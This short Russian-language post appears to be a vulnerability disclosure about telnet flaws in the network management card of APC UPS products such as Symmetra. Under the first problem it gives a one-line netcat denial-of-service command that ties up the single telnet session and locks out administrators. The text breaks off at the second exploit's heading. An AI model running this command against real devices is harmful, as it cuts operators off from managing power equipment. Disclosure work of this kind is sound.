Некоторые APC продукты, например Symmetra, предлагают добавить спец. карточку для того, чтобы администратор мог контролировать APC с возможностью мониторинга и уведомления. Первая ошибка обусловлена тем, что возможен только один единовременный телнет-коннект. Вторая - задержкой, возникающей при введении неправильного логина/пароля при телнет-идентификации.
Проблема №1:
Т.к. разрешен лишь один единовременный телнет-коннект, то администратор идет гулять 🙂
Эксплоит для этого бага:
# cat /dev/zero | nc ip-address 23
Проблема №2:
Временный даун - это, конечно же, хорошо, но вот беда, законнектиться-то не может совсем никто. А что, если ограничить доступ к серверу определенному IP.
Эксплоит для этого бага
